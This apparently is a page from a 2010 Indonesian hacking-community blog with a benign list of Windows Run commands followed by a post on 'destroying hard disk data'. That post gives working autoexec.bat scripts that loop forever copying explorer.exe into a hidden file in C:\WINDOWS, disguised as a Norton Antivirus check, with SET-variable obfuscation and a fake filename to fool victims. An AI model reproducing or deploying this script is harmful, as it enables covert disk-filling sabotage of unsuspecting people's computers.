kelemahan di cgi-bin nya. Teknik yang lebih sukar lagi adalah fragmentasi,
dan penulis sendiri pun masih buta akan hal ini. Semoga artikel ini
bermanfaat dan ada pembaca yang bisa mengembangkan teknik-teknik lebih
baru lagi.
Read rest of entry

Perintah RUN Pada Komputer

Program Run Command

Accessibility Controls = access.cpl

Accessibility Wizard = accwiz

Add Hardware Wizard = hdwwiz.cpl

Add/Remove Programs = appwiz.cpl

Administrative Tools = control admintools

Adobe Acrobat ( if installed ) = acrobat

Adobe Distiller ( if installed ) = acrodist

Adobe ImageReady ( if installed ) = imageready

Adobe Photoshop ( if installed ) = photoshop

Automatic Updates = wuaucpl.cpl

Basic Media Player = mplay32

Bluetooth Transfer Wizard = fsquirt

Calculator calc Ccleaner(if installed) = ccleaner

C: Drive = c:

Certificate Manager = cdrtmgr.msc

Character Map = charmap

Check Disk Utility = chkdsk

Clipboard Viewer = clipbrd

Command Prompt = cmd

Command Prompt = command

Component Services = dcomcnfg

Computer Management = compmgmt.msc

Compare Files = comp

Control Panel = control

Create a shared folder Wizard = shrpubw

Date and Time Properties = timedate.cpl

DDE Shares = ddeshare

Device Manager = devmgmt.msc

Direct X Control Panel ( if installed ) = directx.cpl

Direct X Troubleshooter = dxdiag

Disk Cleanup Utility = cleanmgr

Disk Defragment = dfrg.msc

Disk Partition Manager = diskmgmt.msc

Display Properties = control desktop

Display Properties = desk.cpl

Display Properties(w/Appearance Tab Preselected ) = control color

Dr. Watson System Troubleshooting Utility = drwtsn32

Driver Verifier Utility verifier Ethereal(if installed) = ethereal

Event Viewer = eventvwr.msc

Files and Settings Transfer Tool = migwiz

File Signature Verification Tool = sigverif

Findfast = findfast.cpl

Firefox = firefox

Folders Properties = control folders

Fonts = fonts

Fonts Folder = fonts

Free Cell Card Game = freecell

Game Controllers = joy.cpl

Group Policy Editor ( xp pro ) = gpedit.msc

Hearts Card Game = mshearts

Help and Support = helpctr

Hyperterminal = hypertrm

Hotline Client = hotlineclient

Iexpress Wizard = iexpress

Indexing Service = ciadv.msc

Internet Connection Wizard = icwonn1

Internet Properties = inetcpl.cpl

Internet Setup Wizard = inetwiz

IP Configuration = ipconfig /all

IP Configuration (Display DNS Cache Contents) = ipconfig /displaydns

IP Configuration (Delete DNS Cache Contents) = ipconfig /flushdns

IP Configuration (Release All Connections) = ipconfig /release

IP Configuration (Renew All Connections) = ipconfig /renew

IP Config (Refreshes DHCP & Re-Registers DNS) = ipconfig /registerdns

IP Configuration (Display DHCP Class ID) = ipconfig /showclassid

IP Configuration (Modifies DHCP Class ID) = ipconfig /setclassid

Java Control Panel ( if installed ) = picpl32.cpl

Java Control Panel ( if installed ) = javaws

Keyboard Properties = control keyboard

Local Security Settings = secpol.msc

Local Users and Groups = lusrmgr.msc

Logs You Out of Windows = logoff

Malicious Software Removal Tool = mrt

Microsoft Access ( if installed ) = access.cpl

Microsoft Chat = winchat

Microsoft Excel ( if installed ) = excel

Microsoft Diskpart = diskpart

Microsoft Frontpage ( if installed ) = frontpg

Microsoft Movie Maker = moviemk

Microsoft Management Console = mmc



Microsoft Narrator = narrator

Microsoft Paint = mspaint

Microsoft Powerpoint = powerpnt

Microsoft Word ( if installed ) = winword

Microsoft Syncronization Tool = mobsync

Minesweeper Game = winmine

Mouse Properties = control mouse

Mouse Properties = main.cpl

MS-Dos Editor = edit

MS-Dos FTP = ftp

Nero ( if installed ) = nero

Netmeeting = conf

Network Connections = control netconnections

Network Connections = ncpa.cpl

Network Setup Wizard = netsetup.cpl

Notepad = notepad

Nview Desktop Manager ( if installed ) = nvtuicpl.cpl

Object Packager = packager

ODBC Data Source Administrator = odbccp32

ODBC Data Source Administrator = odbccp32.cpl

On Screen Keyboard = osk

Opens AC3 Filter ( if installed )= ac3filter.cpl

Outlook Express = msimn

Paint = pbrush

Password Properties = password.cpl

Performance Monitor = perfmon.msc

Performance Monitor = perfmon

Phone and Modem Options = telephon.cpl

Phone Dialer = dialer

Pinball Game = pinball

Power Configuration = powercfg.cpl

Printers and Faxes = control printers

Printers Folder= printers

Private Characters Editor = eudcedit

Quicktime ( if installed ) = quicktime.cpl

Quicktime Player ( if installed ) = quicktimeplayer

Real Player ( if installed ) = realplay

Regional Settings = intl.cpl

Registry Editor = regedit

Registry Editor = regedit32

Remote Access Phonebook = rasphone

Remote Desktop = mstsc

Removable Storage = ntmsmgr.msc

Removable Storage Operator Requests = ntmsoprq.msc

Resultant Set of Policy ( xp pro ) = rsop.msc

Scanners and Cameras = sticpl.cpl

Scheduled Tasks control= schedtasks

Security Center = wscui.cpl

Services = services.msc

Shared Folders = fsmgmt.msc

Sharing Session = rtcshare

Shuts Down Windows = shutdown

Sounds Recorder = sndrec32

Sounds and Audio = mmsys.cpl

Spider Solitare Card Game = spider

SQL Client Configuration = clicongf

System Configuration Editor = sysedit

System Configuration Utility = msconfig

System File Checker Utility ( Scan Immediately ) = sfc /scannow

System File Checker Utility ( Scan Once At Next Boot ) = sfc /scanonce

System File Checker Utility ( Scan On Every Boot ) = sfc /scanboot

System File Checker Utility ( Return to Default Settings) = sfc /revert

System File Checker Utility ( Purge File Cache ) = sfc /purgecache

System File Checker Utility ( Set Cache Size to Size x ) = sfc /cachesize=x

System Information msinfo32 System Properties = sysdm.cpl

Task Manager = taskmgr

TCP Tester = tcptest

Telnet Client = telnet

Tweak UI ( if installed ) = tweakui

User Account Management = nusrmgr.cpl

Utility Manager utilman

Volume Serial Number for = C: label

Volume Control = sndvol32

Windows Address Book = wab

Windows Address Book Import Utility = wabmig

Windows Backup Utility ( if installed ) = ntbackup

Windows Explorer = explorer

Windows Firewall = firewall.cpl

Windows Installer Details = msiexec

Windows Magnifier = magnify

Windows Management Infrastructure = wmimgmt.msc

Windows Media Player = wmplayer

Windows Messenger = msnsgs

Windows Picture Import Wizard (Need camera connected) = wiaacmgr

Windows System Security Tool = syskey

Windows Script host settings = wscript

Widnows Updte Launches = wupdmgr

Windows Version ( shows your windows version ) = winver

Windows XP Tour Wizard = tourstart

Wordpad = write

Zoom Utility = igfxzoom
Read rest of entry

Merusak data diHardisk

saya melakukan sedikit eksperimen kecil tentang batch file
tujuan dari 'proyek' ini adalah membuat suatu file batch yg
akan dieksekusi setiap startup [autoexec.bat]. dan file ini
berisi perintah untuk menuliskan suatu karakter ke dalam fi
le yang kita tentukan.

menulis ke dalam file, bukankah hal yang biasa? ^_^ memang.
tapi jika kita loop tak terhingga? :D

pemakai komputer hanya akan menyadari bahwa komputernya me-
ngalami masalah dengan startup dan ketika 'masalah'nya bisa
diatasi, dia mengira isi hardisknya cepat habis!

script utamanya adalah sebagai berikut:

:XYZ
ECHO YOUR TEXT >> C:\FILETUJUAN.EKT
GOTO A

dengan demikian, tulisan YOUR TEXT [bisa dirubah sendiri] akan
tersalin sepenuh hati ke file tujuan dalam jumlah tak terhing-
ga [sampai batch proses di matikan dengan menekan Ctrl + C].


SAMPLE OF FULL SCRIPT [filename = AUTOEXEC.BAT]
---------------------

@echo off
cls
:xyz
echo I Was Here >> c:\file_baru.txt
cls
echo.
echo Scandisk is checking system folder and files...
echo Press Ctrl+C to quit.
goto xyz

----------------------


well, tapi cara di atas kurang ampuh untuk menguras harddisk.
cara yang lumayan ampuh adalah dengan mengganti baris:

ECHO I WAS HERE >> C:\FILE_BARU.TXT

menjadi

TYPE C:\WINDOWS\EXPLORER.EXE >> C:\FILE_BARU.TXT

file target berada di root folder C: dan hal ini pasti cepet
ketahuan. karena itu lebih baik file target diletakkan di folder
C:\WINDOWS [atau di C:\WINDOWS\SYSTEM]. karena di folder ini,
tidak mungkin akan ada pemilik komputer yang hapal isinya secara
keseluruhan. :P

beri nama yang... komputer banget. misalnya setLob.dll atau yang
lain, beri ekstensi yang mirip-mirip file penting.

AWAS, cara ini mungkin hanya untuk korban awam banget. untuk kor-
ban yang agak awam [1/2 awam] kita kelabui dengan cara lain. karena
jika tidak kita kelabui, begitu membaca file autoexec.bat dia akan
segera menyadari apa yang terjadi.

kita 'permainkan' dengan menggunakan SET, juga sedikit social engin
eering.


------------- autoexec.bat begin -----------------
@echo off
@rem NEEDED BY NORTON ANTI VIRUS

@rem This file generated by Norton Anti Virus 2004 to optimize
@rem the Virus Protection Performance. DO NOT delete OR modify
@rem this file.

@echo off

set n=t
set o=yp
set x=dl
set c=set
set e=L
set q=v

:navcheck
%n%%o%e %windir%\explorer.exe >> %windir%\%c%%e%ob.%x%l
cls

echo.
echo NAV 2004 is checking system folder and files...
echo it may take a few second.
echo.
echo If the process not responding,
echo press C%n%rl+C and answer YES.
go%n%o na%q%check

------------------- end of file -------------------

silahkan diutak-atik sendiri biar lebih puas.
ketika saya coba, baru beberapa detik saja sudah dapat
file setLob.dll sebesar -/+ 100 MB!

NOTE:
-----
uji coba menggunakan P4 2.0 GHz 128MB. dicoba di P2 266
64 MB agak lama juga untuk mendapatkan ukuran segitu.

output dari file batch ini adalah file setLob.dll yang
terletak di direktori C:\WINDOWS yang akan selalu ber-
tambah ukurannya.
Read rest of entry
 
#sarudik cyber community#

. Copyright © 2010 Blog is Designed by Ecka Lienardy Sponsored by Sarudik-crew